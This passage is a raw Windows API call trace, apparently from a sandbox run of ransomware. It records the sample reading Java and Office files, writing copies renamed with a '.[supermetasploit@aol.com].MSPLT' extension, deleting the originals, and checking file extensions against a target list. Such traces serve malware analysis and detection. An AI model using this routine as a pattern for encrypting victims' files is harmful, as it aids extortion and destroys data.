lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=36524) returned 1 [0314.695] CloseHandle (hObject=0x540) returned 1 [0314.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.security")) returned 0x20 [0314.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.security.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.695] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.security"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.696] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.696] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.696] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.security.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0314.697] GetLastError () returned 0x0 [0314.697] ReadFile (in: hFile=0x540, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x8eac, lpOverlapped=0x0) returned 1 [0314.713] WriteFile (in: hFile=0x51c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x8eb0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x8eb0, lpOverlapped=0x0) returned 1 [0314.716] ReadFile (in: hFile=0x540, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.716] WriteFile (in: hFile=0x51c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xee, lpOverlapped=0x0) returned 1 [0314.716] SetEndOfFile (hFile=0x51c) returned 1 [0314.739] CloseHandle (hObject=0x51c) returned 1 [0314.753] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.758] SetEndOfFile (hFile=0x540) returned 1 [0314.765] CloseHandle (hObject=0x540) returned 1 [0314.766] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0314.766] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.security")) returned 1 [0314.767] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security") returned 61 [0314.767] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security") returned 61 [0314.767] lstrlenW (lpString=".doc") returned 4 [0314.767] lstrcmpiW (lpString1=".doc", lpString2="rity") returned -1 [0314.767] lstrlenW (lpString=".docx") returned 5 [0314.767] lstrcmpiW (lpString1=".docx", lpString2="urity") returned -1 [0314.767] lstrlenW (lpString=".pdf") returned 4 [0314.767] lstrcmpiW (lpString1=".pdf", lpString2="rity") returned -1 [0314.768] lstrlenW (lpString=".xls") returned 4 [0314.768] lstrcmpiW (lpString1=".xls", lpString2="rity") returned -1 [0314.768] lstrlenW (lpString=".xlsx") returned 5 [0314.768] lstrcmpiW (lpString1=".xlsx", lpString2="urity") returned -1 [0314.768] lstrlenW (lpString=".ppt") returned 4 [0314.768] lstrcmpiW (lpString1=".ppt", lpString2="rity") returned -1 [0314.768] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security") returned 61 [0314.768] lstrlenW (lpString=".zip") returned 4 [0314.768] lstrcmpiW (lpString1=".zip", lpString2="rity") returned -1 [0314.768] lstrlenW (lpString=".rar") returned 4 [0314.768] lstrcmpiW (lpString1=".rar", lpString2="rity") returned -1 [0314.768] lstrlenW (lpString=".bz2") returned 4 [0314.768] lstrcmpiW (lpString1=".bz2", lpString2="rity") returned -1 [0314.768] lstrlenW (lpString=".7z") returned 3 [0314.768] lstrcmpiW (lpString1=".7z", lpString2="ity") returned -1 [0314.768] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security") returned 61 [0314.768] lstrlenW (lpString=".dbf") returned 4 [0314.768] lstrcmpiW (lpString1=".dbf", lpString2="rity") returned -1 [0314.768] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security") returned 61 [0314.768] lstrlenW (lpString=".1cd") returned 4 [0314.768] lstrcmpiW (lpString1=".1cd", lpString2="rity") returned -1 [0314.768] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security") returned 61 [0314.768] lstrlenW (lpString=".jpg") returned 4 [0314.768] lstrcmpiW (lpString1=".jpg", lpString2="rity") returned -1 [0314.769] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security") returned 61 [0314.769] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security") returned 61 [0314.769] lstrlenW (lpString=".doc") returned 4 [0314.769] lstrcmpiW (lpString1=".doc", lpString2="rity") returned -1 [0314.769] lstrlenW (lpString=".docx") returned 5 [0314.769] lstrcmpiW (lpString1=".docx", lpString2="urity") returned -1 [0314.769] lstrlenW (lpString=".pdf") returned 4 [0314.769] lstrcmpiW (lpString1=".pdf", lpString2="rity") returned -1 [0314.769] lstrlenW (lpString=".xls") returned 4 [0314.769] lstrcmpiW (lpString1=".xls", lpString2="rity") returned -1 [0314.769] lstrlenW (lpString=".xlsx") returned 5 [0314.769] lstrcmpiW (lpString1=".xlsx", lpString2="urity") returned -1 [0314.769] lstrlenW (lpString=".ppt") returned 4 [0314.769] lstrcmpiW (lpString1=".ppt", lpString2="rity") returned -1 [0314.769] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security") returned 61 [0314.769] lstrlenW (lpString=".zip") returned 4 [0314.769] lstrcmpiW (lpString1=".zip", lpString2="rity") returned -1 [0314.769] lstrlenW (lpString=".rar") returned 4 [0314.769] lstrcmpiW (lpString1=".rar", lpString2="rity") returned -1 [0314.769] lstrlenW (lpString=".bz2") returned 4 [0314.769] lstrcmpiW (lpString1=".bz2", lpString2="rity") returned -1 [0314.769] lstrlenW (lpString=".7z") returned 3 [0314.769] lstrcmpiW (lpString1=".7z", lpString2="ity") returned -1 [0314.770] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security") returned 61 [0314.770] lstrlenW (lpString=".dbf") returned 4 [0314.770] lstrcmpiW (lpString1=".dbf", lpString2="rity") returned -1 [0314.770] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security") returned 61 [0314.770] lstrlenW (lpString=".1cd") returned 4 [0314.770] lstrcmpiW (lpString1=".1cd", lpString2="rity") returned -1 [0314.770] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security") returned 61 [0314.770] lstrlenW (lpString=".jpg") returned 4 [0314.770] lstrcmpiW (lpString1=".jpg", lpString2="rity") returned -1 [0314.770] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0314.770] lstrlenW (lpString="local_policy.jar") returned 16 [0314.770] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\local_policy.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.771] GetFileSizeEx (in: hFile=0x540, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=3527) returned 1 [0314.771] CloseHandle (hObject=0x540) returned 1 [0314.771] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\local_policy.jar")) returned 0x20 [0314.771] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\local_policy.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.772] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\local_policy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0314.772] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.772] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.772] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\local_policy.jar.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0314.773] GetLastError () returned 0x0 [0314.773] ReadFile (in: hFile=0x540, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0xdc7, lpOverlapped=0x0) returned 1 [0314.775] WriteFile (in: hFile=0x53c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xdd0, lpOverlapped=0x0) returned 1 [0314.777] ReadFile (in: hFile=0x540, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.777] WriteFile (in: hFile=0x53c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xf4, lpOverlapped=0x0) returned 1 [0314.778] SetEndOfFile (hFile=0x53c) returned 1 [0314.778] CloseHandle (hObject=0x53c) returned 1 [0314.778] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.778] SetEndOfFile (hFile=0x540) returned 1 [0314.784] CloseHandle (hObject=0x540) returned 1 [0314.784] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0314.785] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\local_policy.jar")) returned 1 [0314.786] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar") returned 64 [0314.786] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar") returned 64 [0314.786] lstrlenW (lpString=".doc") returned 4 [0314.786] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0314.786] lstrlenW (lpString=".docx") returned 5 [0314.786] lstrcmpiW (lpString1=".docx", lpString2="y.jar") returned -1 [0314.786] lstrlenW (lpString=".pdf") returned 4 [0314.786] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0314.786] lstrlenW (lpString=".xls") returned 4 [0314.786] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0314.786] lstrlenW (lpString=".xlsx") returned 5 [0314.786] lstrcmpiW (lpString1=".xlsx", lpString2="y.jar") returned -1 [0314.787] lstrlenW (lpString=".ppt") returned 4 [0314.787] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0314.787] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar") returned 64 [0314.787] lstrlenW (lpString=".zip") returned 4 [0314.787] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0314.787] lstrlenW (lpString=".rar") returned 4 [0314.787] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0314.787] lstrlenW (lpString=".bz2") returned 4 [0314.787] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0314.787] lstrlenW (lpString=".7z") returned 3 [0314.787] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0314.787] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar") returned 64 [0314.787] lstrlenW (lpString=".dbf") returned 4 [0314.787] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0314.787] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar") returned 64 [0314.787] lstrlenW (lpString=".1cd") returned 4 [0314.787] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0314.787] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar") returned 64 [0314.787] lstrlenW (lpString=".jpg") returned 4 [0314.787] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0314.788] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar") returned 64 [0314.788] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar") returned 64 [0314.788] lstrlenW (lpString=".doc") returned 4 [0314.788] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0314.788] lstrlenW (lpString=".docx") returned 5 [0314.788] lstrcmpiW (lpString1=".docx", lpString2="y.jar") returned -1 [0314.788] lstrlenW (lpString=".pdf") returned 4 [0314.788] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0314.788] lstrlenW (lpString=".xls") returned 4 [0314.788] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0314.788] lstrlenW (lpString=".xlsx") returned 5 [0314.788] lstrcmpiW (lpString1=".xlsx", lpString2="y.jar") returned -1 [0314.788] lstrlenW (lpString=".ppt") returned 4 [0314.788] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0314.788] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar") returned 64 [0314.788] lstrlenW (lpString=".zip") returned 4 [0314.789] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0314.789] lstrlenW (lpString=".rar") returned 4 [0314.789] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0314.789] lstrlenW (lpString=".bz2") returned 4 [0314.789] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0314.789] lstrlenW (lpString=".7z") returned 3 [0314.789] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0314.789] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar") returned 64 [0314.789] lstrlenW (lpString=".dbf") returned 4 [0314.789] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0314.789] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar") returned 64 [0314.789] lstrlenW (lpString=".1cd") returned 4 [0314.789] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0314.789] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar") returned 64 [0314.789] lstrlenW (lpString=".jpg") returned 4 [0314.789] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0314.790] lstrcmpiW (lpString1=".libraries", lpString2=".MSPLT") returned -1 [0314.790] lstrlenW (lpString="trusted.libraries") returned 17 [0314.790] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\trusted.libraries"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0315.105] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=0) returned 1 [0315.105] CloseHandle (hObject=0x3e4) returned 1 [0315.106] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries") returned 65 [0315.106] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries") returned 65 [0315.106] lstrlenW (lpString=".doc") returned 4 [0315.106] lstrcmpiW (lpString1=".doc", lpString2="ries") returned -1 [0315.106] lstrlenW (lpString=".docx") returned 5 [0315.106] lstrcmpiW (lpString1=".docx", lpString2="aries") returned -1 [0315.106] lstrlenW (lpString=".pdf") returned 4 [0315.106] lstrcmpiW (lpString1=".pdf", lpString2="ries") returned -1 [0315.106] lstrlenW (lpString=".xls") returned 4 [0315.106] lstrcmpiW (lpString1=".xls", lpString2="ries") returned -1 [0315.106] lstrlenW (lpString=".xlsx") returned 5 [0315.106] lstrcmpiW (lpString1=".xlsx", lpString2="aries") returned -1 [0315.106] lstrlenW (lpString=".ppt") returned 4 [0315.106] lstrcmpiW (lpString1=".ppt", lpString2="ries") returned -1 [0315.106] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries") returned 65 [0315.106] lstrlenW (lpString=".zip") returned 4 [0315.106] lstrcmpiW (lpString1=".zip", lpString2="ries") returned -1 [0315.106] lstrlenW (lpString=".rar") returned 4 [0315.106] lstrcmpiW (lpString1=".rar", lpString2="ries") returned -1 [0315.106] lstrlenW (lpString=".bz2") returned 4 [0315.106] lstrcmpiW (lpString1=".bz2", lpString2="ries") returned -1 [0315.106] lstrlenW (lpString=".7z") returned 3 [0315.107] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0315.107] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries") returned 65 [0315.107] lstrlenW (lpString=".dbf") returned 4 [0315.107] lstrcmpiW (lpString1=".dbf", lpString2="ries") returned -1 [0315.107] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries") returned 65 [0315.107] lstrlenW (lpString=".1cd") returned 4 [0315.107] lstrcmpiW (lpString1=".1cd", lpString2="ries") returned -1 [0315.107] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries") returned 65 [0315.107] lstrlenW (lpString=".jpg") returned 4 [0315.107] lstrcmpiW (lpString1=".jpg", lpString2="ries") returned -1 [0315.107] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries") returned 65 [0315.107] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries") returned 65 [0315.107] lstrlenW (lpString=".doc") returned 4 [0315.107] lstrcmpiW (lpString1=".doc", lpString2="ries") returned -1 [0315.107] lstrlenW (lpString=".docx") returned 5 [0315.107] lstrcmpiW (lpString1=".docx", lpString2="aries") returned -1 [0315.107] lstrlenW (lpString=".pdf") returned 4 [0315.107] lstrcmpiW (lpString1=".pdf", lpString2="ries") returned -1 [0315.107] lstrlenW (lpString=".xls") returned 4 [0315.107] lstrcmpiW (lpString1=".xls", lpString2="ries") returned -1 [0315.107] lstrlenW (lpString=".xlsx") returned 5 [0315.107] lstrcmpiW (lpString1=".xlsx", lpString2="aries") returned -1 [0315.107] lstrlenW (lpString=".ppt") returned 4 [0315.108] lstrcmpiW (lpString1=".ppt", lpString2="ries") returned -1 [0315.108] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries") returned 65 [0315.108] lstrlenW (lpString=".zip") returned 4 [0315.108] lstrcmpiW (lpString1=".zip", lpString2="ries") returned -1 [0315.108] lstrlenW (lpString=".rar") returned 4 [0315.108] lstrcmpiW (lpString1=".rar", lpString2="ries") returned -1 [0315.108] lstrlenW (lpString=".bz2") returned 4 [0315.108] lstrcmpiW (lpString1=".bz2", lpString2="ries") returned -1 [0315.108] lstrlenW (lpString=".7z") returned 3 [0315.108] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0315.108] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries") returned 65 [0315.108] lstrlenW (lpString=".dbf") returned 4 [0315.108] lstrcmpiW (lpString1=".dbf", lpString2="ries") returned -1 [0315.108] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries") returned 65 [0315.108] lstrlenW (lpString=".1cd") returned 4 [0315.108] lstrcmpiW (lpString1=".1cd", lpString2="ries") returned -1 [0315.108] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\trusted.libraries") returned 65 [0315.108] lstrlenW (lpString=".jpg") returned 4 [0315.108] lstrcmpiW (lpString1=".jpg", lpString2="ries") returned -1 [0315.108] lstrcmpiW (lpString1=".exe", lpString2=".MSPLT") returned -1 [0315.109] lstrlenW (lpString="operamail.exe") returned 13 [0315.109] CreateFileW (lpFileName="C:\\Program Files\\Java\\operamail.exe" (normalized: "c:\\program files\\java\\operamail.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0315.224] GetFileSizeEx (in: hFile=0x51c, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=78336) returned 1 [0315.224] CloseHandle (hObject=0x51c) returned 1 [0315.224] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\operamail.exe" (normalized: "c:\\program files\\java\\operamail.exe")) returned 0x20 [0315.327] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\operamail.exe.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\operamail.exe.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.382] CreateFileW (lpFileName="C:\\Program Files\\Java\\operamail.exe" (normalized: "c:\\program files\\java\\operamail.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0316.405] lstrlenW (lpString="C:\\Program Files\\Java\\operamail.exe") returned 35 [0316.405] lstrlenW (lpString="C:\\Program Files\\Java\\operamail.exe") returned 35 [0316.405] lstrlenW (lpString=".doc") returned 4 [0316.405] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0316.405] lstrlenW (lpString=".docx") returned 5 [0316.405] lstrcmpiW (lpString1=".docx", lpString2="l.exe") returned -1 [0316.405] lstrlenW (lpString=".pdf") returned 4 [0316.405] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0316.405] lstrlenW (lpString=".xls") returned 4 [0316.405] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0316.405] lstrlenW (lpString=".xlsx") returned 5 [0316.405] lstrcmpiW (lpString1=".xlsx", lpString2="l.exe") returned -1 [0316.405] lstrlenW (lpString=".ppt") returned 4 [0316.405] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0316.405] lstrlenW (lpString="C:\\Program Files\\Java\\operamail.exe") returned 35 [0316.405] lstrlenW (lpString=".zip") returned 4 [0316.405] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0316.405] lstrlenW (lpString=".rar") returned 4 [0316.405] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0316.405] lstrlenW (lpString=".bz2") returned 4 [0316.405] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0316.405] lstrlenW (lpString=".7z") returned 3 [0316.405] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0316.405] lstrlenW (lpString="C:\\Program Files\\Java\\operamail.exe") returned 35 [0316.405] lstrlenW (lpString=".dbf") returned 4 [0316.405] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0316.405] lstrlenW (lpString="C:\\Program Files\\Java\\operamail.exe") returned 35 [0316.405] lstrlenW (lpString=".1cd") returned 4 [0316.405] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0316.405] lstrlenW (lpString="C:\\Program Files\\Java\\operamail.exe") returned 35 [0316.405] lstrlenW (lpString=".jpg") returned 4 [0316.405] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0316.406] lstrlenW (lpString="C:\\Program Files\\Java\\operamail.exe") returned 35 [0316.406] lstrlenW (lpString="C:\\Program Files\\Java\\operamail.exe") returned 35 [0316.406] lstrlenW (lpString=".doc") returned 4 [0316.406] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0316.406] lstrlenW (lpString=".docx") returned 5 [0316.406] lstrcmpiW (lpString1=".docx", lpString2="l.exe") returned -1 [0316.406] lstrlenW (lpString=".pdf") returned 4 [0316.406] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0316.406] lstrlenW (lpString=".xls") returned 4 [0316.406] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0316.406] lstrlenW (lpString=".xlsx") returned 5 [0316.406] lstrcmpiW (lpString1=".xlsx", lpString2="l.exe") returned -1 [0316.406] lstrlenW (lpString=".ppt") returned 4 [0316.406] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0316.406] lstrlenW (lpString="C:\\Program Files\\Java\\operamail.exe") returned 35 [0316.406] lstrlenW (lpString=".zip") returned 4 [0316.406] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0316.406] lstrlenW (lpString=".rar") returned 4 [0316.406] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0316.406] lstrlenW (lpString=".bz2") returned 4 [0316.406] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0316.406] lstrlenW (lpString=".7z") returned 3 [0316.406] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0316.406] lstrlenW (lpString="C:\\Program Files\\Java\\operamail.exe") returned 35 [0316.406] lstrlenW (lpString=".dbf") returned 4 [0316.406] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0316.406] lstrlenW (lpString="C:\\Program Files\\Java\\operamail.exe") returned 35 [0316.406] lstrlenW (lpString=".1cd") returned 4 [0316.407] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0316.407] lstrlenW (lpString="C:\\Program Files\\Java\\operamail.exe") returned 35 [0316.407] lstrlenW (lpString=".jpg") returned 4 [0316.407] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0316.407] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0316.407] lstrlenW (lpString="api-ms-win-crt-time-l1-1-0.dll") returned 30 [0316.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, 